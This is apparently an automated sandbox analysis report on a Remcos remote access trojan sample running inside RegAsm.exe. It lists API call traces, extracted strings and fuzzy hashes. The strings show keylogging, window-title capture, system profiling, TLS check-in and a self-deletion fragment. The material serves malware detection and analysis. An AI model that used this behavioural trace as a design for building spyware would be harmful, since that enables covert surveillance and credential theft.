• GetProcAddress.KERNEL32(00000000), ref: 0041CD4B
• LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040EA1C), ref: 0041CD5D
• GetProcAddress.KERNEL32(00000000), ref: 0041CD60
• LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040EA1C), ref: 0041CD6D
• GetProcAddress.KERNEL32(00000000), ref: 0041CD70
• GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
• GetProcAddress.KERNEL32(00000000), ref: 0041CD84
• GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
• GetProcAddress.KERNEL32(00000000), ref: 0041CD98
• LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,0040EA1C), ref: 0041CDAA
• GetProcAddress.KERNEL32(00000000), ref: 0041CDAD
• LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040EA1C), ref: 0041CDBA
• GetProcAddress.KERNEL32(00000000), ref: 0041CDBD
• LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040EA1C), ref: 0041CDCA
• GetProcAddress.KERNEL32(00000000), ref: 0041CDCD
• LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040EA1C), ref: 0041CDDA
• GetProcAddress.KERNEL32(00000000), ref: 0041CDDD
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad$HandleModule
• String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
• API String ID: 4236061018-3687161714
• Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
• Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
• Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
• Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
• SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
• GetLastError.KERNEL32 ref: 0040A328
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A376
• TranslateMessage.USER32(?), ref: 0040A385
• DispatchMessageA.USER32(?), ref: 0040A390
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
• String ID: Keylogger initialization failure: error $`Mw
• API String ID: 3219506041-1277971878
• Opcode ID: 25e136c2ffc33636d357cd73d29a3aedc6f18b6bf984cd9f7b53386870d4f0b3
• Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
• Opcode Fuzzy Hash: 25e136c2ffc33636d357cd73d29a3aedc6f18b6bf984cd9f7b53386870d4f0b3
• Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA

Control-flow Graph

APIs
  • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
  • Part of subcall function 00413584: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 004135C2
  • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
• Sleep.KERNEL32(00000BB8), ref: 0040F896
• ExitProcess.KERNEL32 ref: 0040F905
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseExitOpenProcessQuerySleepValue
• String ID: 5.1.1 Pro$override$pth_unenc
• API String ID: 2281282204-2344886030
• Opcode ID: cd607c0515279b9d97aeea635d6f29185ab9b792f25f3438d110feeae55dec5d
• Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
• Opcode Fuzzy Hash: cd607c0515279b9d97aeea635d6f29185ab9b792f25f3438d110feeae55dec5d
• Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF

Control-flow Graph

                                                                APIs
                                                                • GetLocalTime.KERNEL32(?), ref: 00404F81
                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                                Strings
                                                                • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Create$EventLocalThreadTime
                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                • API String ID: 2532271599-1507639952
                                                                APIs
                                                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,01177260), ref: 004338DA
                                                                • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                                                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                                • String ID:
                                                                • API String ID: 1815803762-0
                                                                APIs
                                                                • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B6BB
                                                                • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Name$ComputerUser
                                                                • String ID:
                                                                • API String ID: 4229901323-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: recv
                                                                • String ID:
                                                                • API String ID: 1507349165-0

                                                                APIs
                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040EA29
                                                                  • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                                • API String ID: 2830904901-3701325316

                                                                APIs
                                                                • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414FB6
                                                                • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                                                • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep$ErrorLastLocalTime
                                                                • String ID: | $%I64u$5.1.1 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$PSG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                                                • API String ID: 524882891-3007660392

                                                                APIs
                                                                • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                                  • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                                  • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                  • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                  • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A859
                                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                                • API String ID: 3795512280-1152054767

                                                                APIs
                                                                • connect.WS2_32(?,?,?), ref: 004048E0
                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                • WSAGetLastError.WS2_32 ref: 00404A21
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                • API String ID: 994465650-2151626615
                                                                • Opcode ID: 45ff517fd2582d6e0a202418ab4ffabcdb2540000aed43e3d88e52077495edcf
                                                                • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                                                • Opcode Fuzzy Hash: 45ff517fd2582d6e0a202418ab4ffabcdb2540000aed43e3d88e52077495edcf
                                                                • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF

                                                                Control-flow Graph

                                                                APIs
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                                • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
                                                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                • String ID:
                                                                • API String ID: 3658366068-0
                                                                • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                                • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58

                                                                Control-flow Graph

                                                                APIs
                                                                • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                                • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                                                • GetForegroundWindow.USER32 ref: 0040AD84
                                                                • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                                                • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040ADC1
                                                                • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                                  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                • String ID: [${ User has been idle for $ minutes }$]
                                                                • API String ID: 911427763-3954389425
                                                                • Opcode ID: 1d1453891d5a0c3fd18e7847a2101c1b07e014a2f3fd082d5303374a996e40ae
                                                                • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                                                • Opcode Fuzzy Hash: 1d1453891d5a0c3fd18e7847a2101c1b07e014a2f3fd082d5303374a996e40ae
                                                                • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F

                                                                Control-flow Graph

                                                                (graph rendering not recoverable from text extraction; node legend: Executed / Not Executed)
                                                                APIs
                                                                • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DBD5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LongNamePath
                                                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                • API String ID: 82841172-425784914
                                                                • Opcode ID: b8d894b691b3e00382c27ba12a86ce93fa8d51d86cdbf8ec607a257f19f9a43d
                                                                • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                                • Opcode Fuzzy Hash: b8d894b691b3e00382c27ba12a86ce93fa8d51d86cdbf8ec607a257f19f9a43d
                                                                • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B

                                                                Control-flow Graph

                                                                (graph rendering not recoverable from text extraction; node legend: Executed / Not Executed)
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CloseHandle$CreatePointerWrite
                                                                • String ID: xpF
                                                                • API String ID: 1852769593-354647465
                                                                • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                                • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639

                                                                Control-flow Graph

                                                                (graph rendering not recoverable from text extraction; node legend: Executed / Not Executed)
                                                                APIs
                                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                  • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                  • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                  • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                • StrToIntA.SHLWAPI(00000000,0046CA08,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0041B3CD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseCurrentOpenProcessQueryValue
                                                                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                • API String ID: 1866151309-2070987746
                                                                • Opcode ID: 619bc13ef983509798e4cc56ab9e00072be03ad0848662060b437d2fd6fbf6a7
                                                                • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                                                • Opcode Fuzzy Hash: 619bc13ef983509798e4cc56ab9e00072be03ad0848662060b437d2fd6fbf6a7
                                                                • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE

                                                                Control-flow Graph

                                                                (graph rendering not recoverable from text extraction; node legend: Executed / Not Executed)
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CloseCreateHandleSizeSleep
                                                                • String ID: XQG
                                                                • API String ID: 1958988193-3606453820
                                                                • Opcode ID: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                                • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                                                • Opcode Fuzzy Hash: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                                • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F

                                                                Control-flow Graph

                                                                APIs
                                                                • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040A249
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040A255
                                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateThread$LocalTimewsprintf
                                                                • String ID: Offline Keylogger Started
                                                                • API String ID: 465354869-4114347211
                                                                • Opcode ID: 098326c162aceabd9f0c0eb4b3a82a63fe043fb3064ffd9179b7d27db5e713f4
                                                                • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                                • Opcode Fuzzy Hash: 098326c162aceabd9f0c0eb4b3a82a63fe043fb3064ffd9179b7d27db5e713f4
                                                                • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                                APIs
                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000,004752F0,?,?,0040F88E,004674C8,5.1.1 Pro), ref: 004137E1
                                                                • RegCloseKey.KERNEL32(?,?,?,0040F88E,004674C8,5.1.1 Pro), ref: 004137EC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseCreateValue
                                                                • String ID: pth_unenc
                                                                • API String ID: 1818849710-4028850238
                                                                • Opcode ID: 4470799dcfde6683a975b44515cd928480e6138ab46ed270d1b1aebcf1de6a3b
                                                                • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
